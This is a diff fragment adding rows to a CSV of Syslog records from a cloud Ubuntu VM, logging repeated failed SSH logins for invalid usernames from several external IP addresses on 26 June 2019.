+11166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:25,UbuntuDevEnv,2019-06-26 00:08:24,auth,UbuntuDevEnv,info,Disconnected from invalid user pradeep 114.112.81.180 port 60538 [preauth],68215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pradeep,114.112.81.1,60538,,
+11167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:26,UbuntuDevEnv,2019-06-26 00:08:26,auth,UbuntuDevEnv,info,Invalid user come from 186.31.116.78 port 51155,68227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,come,186.31.116.7,51155,,
+11168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:26,UbuntuDevEnv,2019-06-26 00:08:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,68227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:26,UbuntuDevEnv,2019-06-26 00:08:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:29,UbuntuDevEnv,2019-06-26 00:08:29,auth,UbuntuDevEnv,info,Failed password for invalid user come from 186.31.116.78 port 51155 ssh2,68227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,come,186.31.116.7,51155,,
+11171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:29,UbuntuDevEnv,2019-06-26 00:08:29,auth,UbuntuDevEnv,info,Disconnected from invalid user come 186.31.116.78 port 51155 [preauth],68227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,come,186.31.116.7,51155,,
+11172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:29,UbuntuDevEnv,2019-06-26 00:08:29,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 51155:11: Bye Bye [preauth],68227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,51155,,
+11173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:00,UbuntuDevEnv,2019-06-26 00:09:00,auth,UbuntuDevEnv,info,Invalid user java from 196.27.127.61 port 49332,68349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,java,196.27.127.6,49332,,
+11174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:00,UbuntuDevEnv,2019-06-26 00:09:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,68349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+11175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:00,UbuntuDevEnv,2019-06-26 00:09:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:02,UbuntuDevEnv,2019-06-26 00:09:02,auth,UbuntuDevEnv,info,Failed password for invalid user java from 196.27.127.61 port 49332 ssh2,68349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,java,196.27.127.6,49332,,
+11177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:03,UbuntuDevEnv,2019-06-26 00:09:02,auth,UbuntuDevEnv,info,Invalid user ocelot from 118.222.146.186 port 34248,68355,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ocelot,118.222.146.1,34248,,
+11178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:03,UbuntuDevEnv,2019-06-26 00:09:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,68355,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:03,UbuntuDevEnv,2019-06-26 00:09:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68355,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:03,UbuntuDevEnv,2019-06-26 00:09:02,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 49332:11: Bye Bye [preauth],68349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,49332,,
+11181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:03,UbuntuDevEnv,2019-06-26 00:09:02,auth,UbuntuDevEnv,info,Disconnected from invalid user java 196.27.127.61 port 49332 [preauth],68349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,java,196.27.127.6,49332,,
+11182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:05,UbuntuDevEnv,2019-06-26 00:09:05,auth,UbuntuDevEnv,info,Failed password for invalid user ocelot from 118.222.146.186 port 34248 ssh2,68355,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ocelot,118.222.146.1,34248,,
+11183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:05,UbuntuDevEnv,2019-06-26 00:09:05,auth,UbuntuDevEnv,info,Disconnected from invalid user ocelot 118.222.146.186 port 34248 [preauth],68355,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ocelot,118.222.146.1,34248,,
+11184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:05,UbuntuDevEnv,2019-06-26 00:09:05,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 34248:11: Bye Bye [preauth],68355,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,34248,,
+11185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:32,UbuntuDevEnv,2019-06-26 00:14:31,auth,UbuntuDevEnv,info,Invalid user charles from 186.31.116.78 port 49326,69558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charles,186.31.116.7,49326,,
+11186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:32,UbuntuDevEnv,2019-06-26 00:14:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:32,UbuntuDevEnv,2019-06-26 00:14:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,69558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:33,UbuntuDevEnv,2019-06-26 00:14:33,auth,UbuntuDevEnv,info,Failed password for invalid user charles from 186.31.116.78 port 49326 ssh2,69558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charles,186.31.116.7,49326,,
+11189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:34,UbuntuDevEnv,2019-06-26 00:14:33,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 49326:11: Bye Bye [preauth],69558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,49326,,
+11190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:34,UbuntuDevEnv,2019-06-26 00:14:33,auth,UbuntuDevEnv,info,Disconnected from invalid user charles 186.31.116.78 port 49326 [preauth],69558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charles,186.31.116.7,49326,,
+11191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:09,UbuntuDevEnv,2019-06-26 00:15:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,69718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:09,UbuntuDevEnv,2019-06-26 00:15:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:09,UbuntuDevEnv,2019-06-26 00:15:08,auth,UbuntuDevEnv,info,Invalid user cen from 131.100.219.3 port 40386,69718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cen,131.100.219.3,40386,,
+11194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:10,UbuntuDevEnv,2019-06-26 00:15:10,auth,UbuntuDevEnv,info,Failed password for invalid user cen from 131.100.219.3 port 40386 ssh2,69718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cen,131.100.219.3,40386,,
+11195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:11,UbuntuDevEnv,2019-06-26 00:15:11,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 40386:11: Bye Bye [preauth],69718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,40386,,
+11196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:11,UbuntuDevEnv,2019-06-26 00:15:11,auth,UbuntuDevEnv,info,Disconnected from invalid user cen 131.100.219.3 port 40386 [preauth],69718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cen,131.100.219.3,40386,,
+11197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:14,UbuntuDevEnv,2019-06-26 00:15:13,auth,UbuntuDevEnv,info,Invalid user ubuntu from 114.112.81.180 port 51674,69740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,114.112.81.1,51674,,
+11198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:14,UbuntuDevEnv,2019-06-26 00:15:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:14,UbuntuDevEnv,2019-06-26 00:15:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,69740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+11200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:16,UbuntuDevEnv,2019-06-26 00:15:16,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 114.112.81.180 port 51674 ssh2,69740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,114.112.81.1,51674,,
+11201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:17,UbuntuDevEnv,2019-06-26 00:15:17,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 51674:11: Bye Bye [preauth],69740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,51674,,
+11202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:17,UbuntuDevEnv,2019-06-26 00:15:17,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 114.112.81.180 port 51674 [preauth],69740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,114.112.81.1,51674,,
+11203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:17,UbuntuDevEnv,2019-06-26 00:15:17,auth,UbuntuDevEnv,info,Invalid user rendszergaz from 88.247.110.88 port 11742,69754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rendszergaz,88.247.110.8,11742,,
+11204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:17,UbuntuDevEnv,2019-06-26 00:15:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,69754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:17,UbuntuDevEnv,2019-06-26 00:15:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:19,UbuntuDevEnv,2019-06-26 00:15:19,auth,UbuntuDevEnv,info,Failed password for invalid user rendszergaz from 88.247.110.88 port 11742 ssh2,69754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rendszergaz,88.247.110.8,11742,,
+11207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:19,UbuntuDevEnv,2019-06-26 00:15:19,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 11742:11: Bye Bye [preauth],69754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,11742,,
+11208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:19,UbuntuDevEnv,2019-06-26 00:15:19,auth,UbuntuDevEnv,info,Disconnected from invalid user rendszergaz 88.247.110.88 port 11742 [preauth],69754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rendszergaz,88.247.110.8,11742,,
+11209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:35,UbuntuDevEnv,2019-06-26 00:15:35,auth,UbuntuDevEnv,info,Invalid user gzuser from 104.248.121.67 port 35606,69880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gzuser,104.248.121.6,35606,,
+11210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:35,UbuntuDevEnv,2019-06-26 00:15:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:35,UbuntuDevEnv,2019-06-26 00:15:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,69880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:37,UbuntuDevEnv,2019-06-26 00:15:37,auth,UbuntuDevEnv,info,Failed password for invalid user gzuser from 104.248.121.67 port 35606 ssh2,69880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gzuser,104.248.121.6,35606,,
+11213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:38,UbuntuDevEnv,2019-06-26 00:15:37,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 35606:11: Bye Bye [preauth],69880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,35606,,
+11214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:38,UbuntuDevEnv,2019-06-26 00:15:37,auth,UbuntuDevEnv,info,Disconnected from invalid user gzuser 104.248.121.67 port 35606 [preauth],69880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gzuser,104.248.121.6,35606,,
+11215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:54,UbuntuDevEnv,2019-06-26 00:15:53,auth,UbuntuDevEnv,info,Invalid user mariajose from 118.222.146.186 port 44842,69946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mariajose,118.222.146.1,44842,,
+11216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:54,UbuntuDevEnv,2019-06-26 00:15:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:54,UbuntuDevEnv,2019-06-26 00:15:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,69946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:56,UbuntuDevEnv,2019-06-26 00:15:55,auth,UbuntuDevEnv,info,Failed password for invalid user mariajose from 118.222.146.186 port 44842 ssh2,69946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mariajose,118.222.146.1,44842,,
+11219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:56,UbuntuDevEnv,2019-06-26 00:15:55,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 44842:11: Bye Bye [preauth],69946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,44842,,
+11220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:15:56,UbuntuDevEnv,2019-06-26 00:15:55,auth,UbuntuDevEnv,info,Disconnected from invalid user mariajose 118.222.146.186 port 44842 [preauth],69946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mariajose,118.222.146.1,44842,,
+11221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:16:31,UbuntuDevEnv,2019-06-26 00:16:31,auth,UbuntuDevEnv,info,Invalid user thibault from 186.31.116.78 port 58129,70078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,thibault,186.31.116.7,58129,,
+11222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:16:31,UbuntuDevEnv,2019-06-26 00:16:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:16:31,UbuntuDevEnv,2019-06-26 00:16:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,70078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:16:34,UbuntuDevEnv,2019-06-26 00:16:33,auth,UbuntuDevEnv,info,Failed password for invalid user thibault from 186.31.116.78 port 58129 ssh2,70078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,thibault,186.31.116.7,58129,,
+11225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:16:34,UbuntuDevEnv,2019-06-26 00:16:34,auth,UbuntuDevEnv,info,Disconnected from invalid user thibault 186.31.116.78 port 58129 [preauth],70078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,thibault,186.31.116.7,58129,,
